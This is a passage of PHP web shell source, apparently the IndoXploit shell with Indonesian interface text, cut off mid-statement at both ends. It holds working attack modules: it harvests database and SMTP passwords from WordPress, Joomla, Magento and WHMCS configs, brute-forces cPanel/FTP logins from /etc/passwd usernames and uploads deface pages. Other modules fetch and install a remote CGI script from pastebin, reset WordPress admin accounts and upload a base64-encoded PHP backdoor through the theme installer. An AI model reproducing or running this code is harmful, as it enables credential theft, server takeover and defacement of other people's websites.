value='Crack'>\r\n\t\t</form>\r\n\t\t<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>\";\r\n\t}\r\n} elseif(\$_GET['do'] == 'cpftp_auto') {\r\n\tif(\$_POST['crack']) {\r\n\t\t\$usercp = explode(\"\\r\\n\", \$_POST['user_cp']);\r\n\t\t\$passcp = explode(\"\\r\\n\", \$_POST['pass_cp']);\r\n\t\t\$i = 0;\r\n\t\tforeach(\$usercp as \$ucp) {\r\n\t\t\tforeach(\$passcp as \$pcp) {\r\n\t\t\t\tif(@mysql_connect('localhost', \$ucp, \$pcp)) {\r\n\t\t\t\t\tif(\$_SESSION[\$ucp] && \$_SESSION[\$pcp]) {\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\$_SESSION[\$ucp] = \"1\";\r\n\t\t\t\t\t\t\$_SESSION[\$pcp] = \"1\";\r\n\t\t\t\t\t\tif(\$ucp == '' || \$pcp == '') {\r\n\t\t\t\t\t\t\t//\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\techo \"[+] username (<font color=lime>\$ucp</font>) password (<font color=lime>\$pcp</font>)<br>\";\r\n\t\t\t\t\t\t\t\$ftp_conn = ftp_connect(gethostbyname(\$_SERVER['HTTP_HOST']));\r\n\t\t\t\t\t\t\t\$ftp_login = ftp_login(\$ftp_conn, \$ucp, \$pcp);\r\n\t\t\t\t\t\t\tif((!\$ftp_login) || (!\$ftp_conn)) {\r\n\t\t\t\t\t\t\t\techo \"[+] <font color=red>Login Gagal</font><br><br>\";\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\techo \"[+] <font color=lime>Login Sukses</font><br>\";\r\n\t\t\t\t\t\t\t\t\$fi = htmlspecialchars(\$_POST['file_deface']);\r\n\t\t\t\t\t\t\t\t\$deface = ftp_put(\$ftp_conn, \"public_html/\$fi\", \$_POST['deface'], FTP_BINARY);\r\n\t\t\t\t\t\t\t\tif(\$deface) {\r\n\t\t\t\t\t\t\t\t\t\$i++;\r\n\t\t\t\t\t\t\t\t\techo \"[+] <font color=lime>Deface Sukses</font><br>\";\r\n\t\t\t\t\t\t\t\t\tif(function_exists('posix_getpwuid')) {\r\n\t\t\t\t\t\t\t\t\t\t\$domain_cp = file_get_contents(\"/etc/named.conf\");\t\r\n\t\t\t\t\t\t\t\t\t\tif(\$domain_cp == '') {\r\n\t\t\t\t\t\t\t\t\t\t\techo \"[+] <font color=red>gabisa ambil nama domain nya</font><br><br>\";\r\n\t\t\t\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t\t\t\tpreg_match_all(\"#/var/named/(.*?).db#\", \$domain_cp, \$domains_cp);\r\n\t\t\t\t\t\t\t\t\t\t\tforeach(\$domains_cp[1] as \$dj) {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\$user_cp_url = posix_getpwuid(@fileowner(\"/etc/valiases/\$dj\"));\r\n\t\t\t\t\t\t\t\t\t\t\t\t\$user_cp_url = \$user_cp_url['name'];\r\n\t\t\t\t\t\t\t\t\t\t\t\tif(\$user_cp_url == \$ucp) {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\techo \"[+] <a href='http://\$dj/\$fi' target='_blank'>http://\$dj/\$fi</a><br><br>\";\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t\t\techo \"[+] <font color=red>gabisa ambil nama domain nya</font><br><br>\";\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t\techo \"[-] <font color=red>Deface Gagal</font><br><br>\";\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t//echo \"username (<font color=lime>\$ucp</font>) password (<font color=lime>\$pcp</font>)<br>\";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tif(\$i == 0) {\r\n\t\t} else {\r\n\t\t\techo \"<br>Succes Deface! \".\$i.\" Cpanel From <font color=lime>ALLAH SWT</font>\";\r\n\t\t}\r\n\t} else {\r\n\t\techo \"<center>\r\n\t\t<form method='post'>\r\n\t\tFilename: <br>\r\n\t\t<input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>\r\n\t\tDeface Page: <br>\r\n\t\t<input type='text' name='deface' placeholder='http://www.web-yang-udah-do-deface.com/filemu.php' style='width: 450px;'><br>\r\n\t\tUSER: <br>\r\n\t\t<textarea style='width: 450px; height: 150px;' name='user_cp'>\";\r\n\t\t\$_usercp = fopen(\"/etc/passwd\",\"r\");\r\n\t\twhile(\$getu = fgets(\$_usercp)) {\r\n\t\t\tif(\$getu == '' || !\$_usercp) {\r\n\t\t\t\techo \"<font color=red>Can't read /etc/passwd</font>\";\r\n\t\t\t} else {\r\n\t\t\t\tpreg_match_all(\"/(.*?):x:/\", \$getu, \$u);\r\n\t\t\t\tforeach(\$u[1] as \$user_cp) {\r\n\t\t\t\t\t\tif(is_dir(\"/home/\$user_cp/public_html\")) {\r\n\t\t\t\t\t\t\techo \"\$user_cp\\n\";\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\techo \"</textarea><br>\r\n\t\tPASS: <br>\r\n\t\t<textarea style='width: 450px; height: 200px;' name='pass_cp'>\";\r\n\t\tfunction cp_pass(\$dir) {\r\n\t\t\t\$pass = \"\";\r\n\t\t\t\$dira = scandir(\$dir);\r\n\t\t\tforeach(\$dira as \$dirb) {\r\n\t\t\t\tif(!is_file(\"\$dir/\$dirb\")) continue;\r\n\t\t\t\t\$ambil = file_get_contents(\"\$dir/\$dirb\");\r\n\t\t\t\tif(preg_match(\"/WordPress/\", \$ambil)) {\r\n\t\t\t\t\t\$pass .= ambilkata(\$ambil,\"DB_PASSWORD', '\",\"'\").\"\\n\";\r\n\t\t\t\t} elseif(preg_match(\"/JConfig|joomla/\", \$ambil)) {\r\n\t\t\t\t\t\$pass .= ambilkata(\$ambil,\"password = '\",\"'\").\"\\n\";\r\n\t\t\t\t} elseif(preg_match(\"/Magento|Mage_Core/\", \$ambil)) {\r\n\t\t\t\t\t\$pass .= ambilkata(\$ambil,\"<password><![CDATA[\",\"]]></password>\").\"\\n\";\r\n\t\t\t\t} elseif(preg_match(\"/panggil fungsi validasi xss dan injection/\", \$ambil)) {\r\n\t\t\t\t\t\$pass .= ambilkata(\$ambil,'password = \"','\"').\"\\n\";\r\n\t\t\t\t} elseif(preg_match(\"/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/\", \$ambil)) {\r\n\t\t\t\t\t\$pass .= ambilkata(\$ambil,\"'DB_PASSWORD', '\",\"'\").\"\\n\";\r\n\t\t\t\t} elseif(preg_match(\"/client/\", \$ambil)) {\r\n\t\t\t\t\tpreg_match(\"/password=(.*)/\", \$ambil, \$pass1);\r\n\t\t\t\t\tif(preg_match('/\"/', \$pass1[1])) {\r\n\t\t\t\t\t\t\$pass1[1] = str_replace('\"', \"\", \$pass1[1]);\r\n\t\t\t\t\t\t\$pass .= \$pass1[1].\"\\n\";\r\n\t\t\t\t\t}\r\n\t\t\t\t} elseif(preg_match(\"/cc_encryption_hash/\", \$ambil)) {\r\n\t\t\t\t\t\$pass .= ambilkata(\$ambil,\"db_password = '\",\"'\").\"\\n\";\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\techo \$pass;\r\n\t\t}\r\n\t\t\$cp_pass = cp_pass(\$dir);\r\n\t\techo \$cp_pass;\r\n\t\techo \"</textarea><br>\r\n\t\t<input type='submit' name='crack' style='width: 100px;' value='Submit'>\r\n\t\t</form>\r\n\t\t<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>\";\r\n\t}\r\n} elseif(\$_GET['do'] == 'smtp') {\r\n\techo \"<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>\";\r\n\tfunction scj(\$dir) {\r\n\t\t\$dira = scandir(\$dir);\r\n\t\tforeach(\$dira as \$dirb) {\r\n\t\t\tif(!is_file(\"\$dir/\$dirb\")) continue;\r\n\t\t\t\$ambil = file_get_contents(\"\$dir/\$dirb\");\r\n\t\t\t\$ambil = str_replace(\"\$\", \"\", \$ambil);\r\n\t\t\tif(preg_match(\"/JConfig|joomla/\", \$ambil)) {\r\n\t\t\t\t\$smtp_host = ambilkata(\$ambil,\"smtphost = '\",\"'\");\r\n\t\t\t\t\$smtp_auth = ambilkata(\$ambil,\"smtpauth = '\",\"'\");\r\n\t\t\t\t\$smtp_user = ambilkata(\$ambil,\"smtpuser = '\",\"'\");\r\n\t\t\t\t\$smtp_pass = ambilkata(\$ambil,\"smtppass = '\",\"'\");\r\n\t\t\t\t\$smtp_port = ambilkata(\$ambil,\"smtpport = '\",\"'\");\r\n\t\t\t\t\$smtp_secure = ambilkata(\$ambil,\"smtpsecure = '\",\"'\");\r\n\t\t\t\techo \"SMTP Host: <font color=lime>\$smtp_host</font><br>\";\r\n\t\t\t\techo \"SMTP port: <font color=lime>\$smtp_port</font><br>\";\r\n\t\t\t\techo \"SMTP user: <font color=lime>\$smtp_user</font><br>\";\r\n\t\t\t\techo \"SMTP pass: <font color=lime>\$smtp_pass</font><br>\";\r\n\t\t\t\techo \"SMTP auth: <font color=lime>\$smtp_auth</font><br>\";\r\n\t\t\t\techo \"SMTP secure: <font color=lime>\$smtp_secure</font><br><br>\";\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\t\$smpt_hunter = scj(\$dir);\r\n\techo \$smpt_hunter;\r\n} elseif(\$_GET['do'] == 'auto_wp') {\r\n\tif(\$_POST['hajar']) {\r\n\t\t\$title = htmlspecialchars(\$_POST['new_title']);\r\n\t\t\$pn_title = str_replace(\" \", \"-\", \$title);\r\n\t\tif(\$_POST['cek_edit'] == \"Y\") {\r\n\t\t\t\$script = \$_POST['edit_content'];\r\n\t\t} else {\r\n\t\t\t\$script = \$title;\r\n\t\t}\r\n\t\t\$conf = \$_POST['config_dir'];\r\n\t\t\$scan_conf = scandir(\$conf);\r\n\t\tforeach(\$scan_conf as \$file_conf) {\r\n\t\t\tif(!is_file(\"\$conf/\$file_conf\")) continue;\r\n\t\t\t\$config = file_get_contents(\"\$conf/\$file_conf\");\r\n\t\t\tif(preg_match(\"/WordPress/\", \$config)) {\r\n\t\t\t\t\$dbhost = ambilkata(\$config,\"DB_HOST', '\",\"'\");\r\n\t\t\t\t\$dbuser = ambilkata(\$config,\"DB_USER', '\",\"'\");\r\n\t\t\t\t\$dbpass = ambilkata(\$config,\"DB_PASSWORD', '\",\"'\");\r\n\t\t\t\t\$dbname = ambilkata(\$config,\"DB_NAME', '\",\"'\");\r\n\t\t\t\t\$dbprefix = ambilkata(\$config,\"table_prefix = '\",\"'\");\r\n\t\t\t\t\$prefix = \$dbprefix.\"posts\";\r\n\t\t\t\t\$option = \$dbprefix.\"options\";\r\n\t\t\t\t\$conn = mysql_connect(\$dbhost,\$dbuser,\$dbpass);\r\n\t\t\t\t\$db = mysql_select_db(\$dbname);\r\n\t\t\t\t\$q = mysql_query(\"SELECT * FROM \$prefix ORDER BY ID ASC\");\r\n\t\t\t\t\$result = mysql_fetch_array(\$q);\r\n\t\t\t\t\$id = \$result[ID];\r\n\t\t\t\t\$q2 = mysql_query(\"SELECT * FROM \$option ORDER BY option_id ASC\");\r\n\t\t\t\t\$result2 = mysql_fetch_array(\$q2);\r\n\t\t\t\t\$target = \$result2[option_value];\r\n\t\t\t\t\$update = mysql_query(\"UPDATE \$prefix SET post_title='\$title',post_content='\$script',post_name='\$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='\$id'\");\r\n\t\t\t\t\$update .= mysql_query(\"UPDATE \$option SET option_value='\$title' WHERE option_name='blogname' OR option_name='blogdescription'\");\r\n\t\t\t\techo \"<div style='margin: 5px auto;'>\";\r\n\t\t\t\tif(\$target == '') {\r\n\t\t\t\t\techo \"URL: <font color=red>error, gabisa ambil nama domain nya</font> -> \";\r\n\t\t\t\t} else {\r\n\t\t\t\t\techo \"URL: <a href='\$target/?p=\$id' target='_blank'>\$target/?p=\$id</a> -> \";\r\n\t\t\t\t}\r\n\t\t\t\tif(!\$update OR !\$conn OR !\$db) {\r\n\t\t\t\t\techo \"<font color=red>MySQL Error: \".mysql_error().\"</font><br>\";\r\n\t\t\t\t} else {\r\n\t\t\t\t\techo \"<font color=lime>sukses di ganti.</font><br>\";\r\n\t\t\t\t}\r\n\t\t\t\techo \"</div>\";\r\n\t\t\t\tmysql_close(\$conn);\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo \"<center>\r\n\t\t<h1>Auto Edit Title+Content WordPress</h1>\r\n\t\t<form method='post'>\r\n\t\tDIR Config: <br>\r\n\t\t<input type='text' size='50' name='config_dir' value='\$dir'><br><br>\r\n\t\tSet Title: <br>\r\n\t\t<input type='text' name='new_title' value='Hacked by ' placeholder='New Title'><br><br>\r\n\t\tEdit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>\r\n\t\t<span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>\r\n\t\t<textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>\r\n\t\t<input type='submit' name='hajar' value='Submit' style='width: 100px;'><br>\r\n\t\t</form>\r\n\t\t<span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>\r\n\t\t\";\r\n\t}\r\n} elseif(\$_GET['do'] == 'zoneh') {\r\n\tif(\$_POST['submit']) {\r\n\t\t\$domain = explode(\"\\r\\n\", \$_POST['url']);\r\n\t\t\$nick = \$_POST['nick'];\r\n\t\techo \"Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=\$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=\$nick/published=0</a><br>\";\r\n\t\techo \"Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=\$nick' target='_blank'>http://www.zone-h.org/archive/notifier=\$nick</a><br><br>\";\r\n\t\tfunction zoneh(\$url,\$nick) {\r\n\t\t\t\$ch = curl_init(\"http://www.zone-h.com/notify/single\");\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_POST, true);\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_POSTFIELDS, \"defacer=\$nick&domain1=\$url&hackmode=1&reason=1&submit=Send\");\r\n\t\t\treturn curl_exec(\$ch);\r\n\t\t\t\t curl_close(\$ch);\r\n\t\t}\r\n\t\tforeach(\$domain as \$url) {\r\n\t\t\t\$zoneh = zoneh(\$url,\$nick);\r\n\t\t\tif(preg_match(\"/color=\\\"red\\\">OK<\\/font><\\/li>/i\", \$zoneh)) {\r\n\t\t\t\techo \"\$url -> <font color=lime>OK</font><br>\";\r\n\t\t\t} else {\r\n\t\t\t\techo \"\$url -> <font color=red>ERROR</font><br>\";\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo \"<center><form method='post'>\r\n\t\t<u>Defacer</u>: <br>\r\n\t\t<input type='text' name='nick' size='58' value='./MekiTembem404'><br>\r\n\t\t<u>Domains</u>: <br>\r\n\t\t<textarea style='width: 450px; height: 150px;' name='url'></textarea><br>\r\n\t\t<input type='submit' name='submit' value='Submit' style='width: 100px;'>\r\n\t\t</form>\";\r\n\t}\r\n\techo \"</center>\";\r\n} elseif(\$_GET['do'] == 'cgi') {\r\n\t\$cgi_dir = mkdir('idx_cgi', 0755);\r\n\t\$file_cgi = \"idx_cgi/cgi.izo\";\r\n\t\$isi_htcgi = \"AddHandler cgi-script .izo\";\r\n\t\$htcgi = fopen(\".htaccess\", \"w\");\r\n\t\$cgi_script = file_get_contents(\"http://pastebin.com/raw.php?i=XTUFfJLg\");\r\n\t\$cgi = fopen(\$file_cgi, \"w\");\r\n\tfwrite(\$cgi, \$cgi_script);\r\n\tfwrite(\$htcgi, \$isi_htcgi);\r\n\tchmod(\$file_cgi, 0755);\r\n\techo \"<iframe src='idx_cgi/cgi.izo' width='100%' height='270%' frameborder='0' scrolling='yes'></iframe>\";\r\n} elseif(\$_GET['do'] == 'fake_root') {\r\n\tob_start();\r\n\tfunction reverse(\$url) {\r\n\t\t\$ch = curl_init(\"http://domains.yougetsignal.com/domains.php\");\r\n\t\t\t curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, 1 );\r\n\t\t\t curl_setopt(\$ch, CURLOPT_POSTFIELDS, \"remoteAddress=\$url&ket=\");\r\n\t\t\t curl_setopt(\$ch, CURLOPT_HEADER, 0);\r\n\t\t\t curl_setopt(\$ch, CURLOPT_POST, 1);\r\n\t\t\$resp = curl_exec(\$ch);\r\n\t\t\$resp = str_replace(\"[\",\"\", str_replace(\"]\",\"\", str_replace(\"\\\"\\\"\",\"\", str_replace(\", ,\",\",\", str_replace(\"{\",\"\", str_replace(\"{\",\"\", str_replace(\"}\",\"\", str_replace(\", \",\",\", str_replace(\", \",\",\", str_replace(\"'\",\"\", str_replace(\"'\",\"\", str_replace(\":\",\",\", str_replace('\"','', \$resp ) ) ) ) ) ) ) ) ) ))));\r\n\t\t\$array = explode(\",,\", \$resp);\r\n\t\tunset(\$array[0]);\r\n\t\tforeach(\$array as \$lnk) {\r\n\t\t\t\$lnk = \"http://\$lnk\";\r\n\t\t\t\$lnk = str_replace(\",\", \"\", \$lnk);\r\n\t\t\techo \$lnk.\"\\n\";\r\n\t\t\tob_flush();\r\n\t\t\tflush();\r\n\t\t}\r\n\t\t\t curl_close(\$ch);\r\n\t}\r\n\tfunction cek(\$url) {\r\n\t\t\$ch = curl_init(\$url);\r\n\t\t\t curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, 1 );\r\n\t\t\t curl_setopt(\$ch, CURLOPT_FOLLOWLOCATION, true);\r\n\t\t\$resp = curl_exec(\$ch);\r\n\t\treturn \$resp;\r\n\t}\r\n\t\$cwd = getcwd();\r\n\t\$ambil_user = explode(\"/\", \$cwd);\r\n\t\$user = \$ambil_user[2];\r\n\tif(\$_POST['reverse']) {\r\n\t\t\$site = explode(\"\\r\\n\", \$_POST['url']);\r\n\t\t\$file = \$_POST['file'];\r\n\t\tforeach(\$site as \$url) {\r\n\t\t\t\$cek = cek(\"\$url/~\$user/\$file\");\r\n\t\t\tif(preg_match(\"/hacked/i\", \$cek)) {\r\n\t\t\t\techo \"URL: <a href='\$url/~\$user/\$file' target='_blank'>\$url/~\$user/\$file</a> -> <font color=lime>Fake Root!</font><br>\";\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo \"<center><form method='post'>\r\n\t\tFilename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>\r\n\t\tUser: <br><input type='text' value='\$user' size='50' height='10' readonly><br>\r\n\t\tDomain: <br>\r\n\t\t<textarea style='width: 450px; height: 250px;' name='url'>\";\r\n\t\treverse(\$_SERVER['HTTP_HOST']);\r\n\t\techo \"</textarea><br>\r\n\t\t<input type='submit' name='reverse' value='Scan' style='width: 100px;'>\r\n\t\t</form><br>\r\n\t\tNB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>\";\r\n\t}\r\n} elseif(\$_GET['do'] == 'adminer') {\r\n\t\$full = str_replace(\$_SERVER['DOCUMENT_ROOT'], \"\", \$dir);\r\n\tfunction adminer(\$url, \$isi) {\r\n\t\t\$fp = fopen(\$isi, \"w\");\r\n\t\t\$ch = curl_init();\r\n\t\t \t curl_setopt(\$ch, CURLOPT_URL, \$url);\r\n\t\t \t curl_setopt(\$ch, CURLOPT_BINARYTRANSFER, true);\r\n\t\t \t curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);\r\n\t\t \t curl_setopt(\$ch, CURLOPT_SSL_VERIFYPEER, false);\r\n\t\t \t curl_setopt(\$ch, CURLOPT_FILE, \$fp);\r\n\t\treturn curl_exec(\$ch);\r\n\t\t \t curl_close(\$ch);\r\n\t\tfclose(\$fp);\r\n\t\tob_flush();\r\n\t\tflush();\r\n\t}\r\n\tif(file_exists('adminer.php')) {\r\n\t\techo \"<center><font color=lime><a href='\$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>\";\r\n\t} else {\r\n\t\tif(adminer(\"https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php\",\"adminer.php\")) {\r\n\t\t\techo \"<center><font color=lime><a href='\$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>\";\r\n\t\t} else {\r\n\t\t\techo \"<center><font color=red>gagal buat file adminer</font></center>\";\r\n\t\t}\r\n\t}\r\n} elseif(\$_GET['do'] == 'auto_dwp') {\r\n\tif(\$_POST['auto_deface_wp']) {\r\n\t\tfunction anucurl(\$sites) {\r\n \t\t\$ch = curl_init(\$sites);\r\n\t \t\t curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t \t\t curl_setopt(\$ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t \t\t curl_setopt(\$ch, CURLOPT_USERAGENT, \"Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0\");\r\n\t \t\t curl_setopt(\$ch, CURLOPT_CONNECTTIMEOUT, 5);\r\n\t \t\t curl_setopt(\$ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t \t\t curl_setopt(\$ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t \t\t curl_setopt(\$ch, CURLOPT_COOKIEJAR,'cookie.txt');\r\n\t \t\t curl_setopt(\$ch, CURLOPT_COOKIEFILE,'cookie.txt');\r\n\t \t\t curl_setopt(\$ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t\$data = curl_exec(\$ch);\r\n\t\t\t\t curl_close(\$ch);\r\n\t\t\treturn \$data;\r\n\t\t}\r\n\t\tfunction lohgin(\$cek, \$web, \$userr, \$pass, \$wp_submit) {\r\n \t\t\$post = array(\r\n \"log\" => \"\$userr\",\r\n \"pwd\" => \"\$pass\",\r\n \"rememberme\" => \"forever\",\r\n \"wp-submit\" => \"\$wp_submit\",\r\n \"redirect_to\" => \"\$web\",\r\n \"testcookie\" => \"1\",\r\n );\r\n\t\t\t\$ch = curl_init(\$cek);\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_USERAGENT, \"Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0\");\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_POST, 1);\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_POSTFIELDS, \$post);\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_COOKIEJAR,'cookie.txt');\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_COOKIEFILE,'cookie.txt');\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t\$data = curl_exec(\$ch);\r\n\t\t\t\t curl_close(\$ch);\r\n\t\t\treturn \$data;\r\n\t\t}\r\n\t\t\$scan = \$_POST['link_config'];\r\n\t\t\$link_config = scandir(\$scan);\r\n\t\t\$script = htmlspecialchars(\$_POST['script']);\r\n\t\t\$user = \"indoxploit\";\r\n\t\t\$pass = \"indoxploit\";\r\n\t\t\$passx = md5(\$pass);\r\n\t\tforeach(\$link_config as \$dir_config) {\r\n\t\t\tif(!is_file(\"\$scan/\$dir_config\")) continue;\r\n\t\t\t\$config = file_get_contents(\"\$scan/\$dir_config\");\r\n\t\t\tif(preg_match(\"/WordPress/\", \$config)) {\r\n\t\t\t\t\$dbhost = ambilkata(\$config,\"DB_HOST', '\",\"'\");\r\n\t\t\t\t\$dbuser = ambilkata(\$config,\"DB_USER', '\",\"'\");\r\n\t\t\t\t\$dbpass = ambilkata(\$config,\"DB_PASSWORD', '\",\"'\");\r\n\t\t\t\t\$dbname = ambilkata(\$config,\"DB_NAME', '\",\"'\");\r\n\t\t\t\t\$dbprefix = ambilkata(\$config,\"table_prefix = '\",\"'\");\r\n\t\t\t\t\$prefix = \$dbprefix.\"users\";\r\n\t\t\t\t\$option = \$dbprefix.\"options\";\r\n\t\t\t\t\$conn = mysql_connect(\$dbhost,\$dbuser,\$dbpass);\r\n\t\t\t\t\$db = mysql_select_db(\$dbname);\r\n\t\t\t\t\$q = mysql_query(\"SELECT * FROM \$prefix ORDER BY id ASC\");\r\n\t\t\t\t\$result = mysql_fetch_array(\$q);\r\n\t\t\t\t\$id = \$result[ID];\r\n\t\t\t\t\$q2 = mysql_query(\"SELECT * FROM \$option ORDER BY option_id ASC\");\r\n\t\t\t\t\$result2 = mysql_fetch_array(\$q2);\r\n\t\t\t\t\$target = \$result2[option_value];\r\n\t\t\t\tif(\$target == '') {\t\t\t\t\t\r\n\t\t\t\t\techo \"[-] <font color=red>error, gabisa ambil nama domain nya</font><br>\";\r\n\t\t\t\t} else {\r\n\t\t\t\t\techo \"[+] \$target <br>\";\r\n\t\t\t\t}\r\n\t\t\t\t\$update = mysql_query(\"UPDATE \$prefix SET user_login='\$user',user_pass='\$passx' WHERE ID='\$id'\");\r\n\t\t\t\tif(!\$conn OR !\$db OR !\$update) {\r\n\t\t\t\t\techo \"[-] MySQL Error: <font color=red>\".mysql_error().\"</font><br><br>\";\r\n\t\t\t\t\tmysql_close(\$conn);\r\n\t\t\t\t} else {\r\n\t\t\t\t\t\$site = \"\$target/wp-login.php\";\r\n\t\t\t\t\t\$site2 = \"\$target/wp-admin/theme-install.php?upload\";\r\n\t\t\t\t\t\$b1 = anucurl(\$site2);\r\n\t\t\t\t\t\$wp_sub = ambilkata(\$b1, \"id=\\\"wp-submit\\\" class=\\\"button button-primary button-large\\\" value=\\\"\",\"\\\" />\");\r\n\t\t\t\t\t\$b = lohgin(\$site, \$site2, \$user, \$pass, \$wp_sub);\r\n\t\t\t\t\t\$anu2 = ambilkata(\$b,\"name=\\\"_wpnonce\\\" value=\\\"\",\"\\\" />\");\r\n\t\t\t\t\t\$upload3 = base64_decode(\"Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==\");\r\n\t\t\t\t\t\$www = \"m.php\";\r\n\t\t\t\t\t\$fp5 = fopen(\$www,\"w\");\r\n\t\t\t\t\tfputs(\$fp5,\$upload3);\r\n\t\t\t\t\t\$post2 = array(\r\n\t\t\t\t\t\t\t\"_wpnonce\" => \"\$anu2\",\r\n\t\t\t\t\t\t\t\"_wp_http_referer\" => \"/wp-admin/theme-install.php?upload\",\r\n\t\t\t\t\t\t\t\"themezip\" => \"@\$www\",\r\n\t\t\t\t\t\t\t\"install-theme-submit\" => \"Install Now\",\r\n\t\t\t\t\t\t\t);\r\n\t\t\t\t\t\$ch = curl_init(\"\$target/wp-admin/update.php?action=upload-theme\");\r\n\t\t\t\t\t\t curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t\t\t curl_setopt(\$ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t\t\t\t\t\t curl_setopt(\$ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t\t\t\t\t\t curl_setopt(\$ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t\t\t\t\t\t curl_setopt(\$ch, CURLOPT_POST, 1);\r\n\t\t\t\t\t\t curl_setopt(\$ch, CURLOPT_POSTFIELDS, \$post2);\r\n\t\t\t\t\t\t curl_setopt(\$ch, CURLOPT_COOKIEJAR,'cookie.txt');\r\n\t\t\t\t\t\t curl_setopt(\$ch, CURLOPT_COOKIEFILE,'cookie.txt');\r\n\t\t\t\t\t curl_setopt(\$ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t\t\t\$data3 = curl_exec(\$ch);\r\n\t\t\t\t\t\t curl_close(\$ch);\r\n\t\t\t\t\t\$y = date(\"Y\");\r\n\t\t\t\t\t\$m = date(\"m\");\r\n\t\t\t\t\t\$namafile = \"id.php\";\r\n\t\t\t\t\t\$fpi = fopen(\$namafile,\"w\");\r\n\t\t\t\t\tfputs(\$fpi,\$script);\r\n\t\t\t\t\t\$ch6 = 